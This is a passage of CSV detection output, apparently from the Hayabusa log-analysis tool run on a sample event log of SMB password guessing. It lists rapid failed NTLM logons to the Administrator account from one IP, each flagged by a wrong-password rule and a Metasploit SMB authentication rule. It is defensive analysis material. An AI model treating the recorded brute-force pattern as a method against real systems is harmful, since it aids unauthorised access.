NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
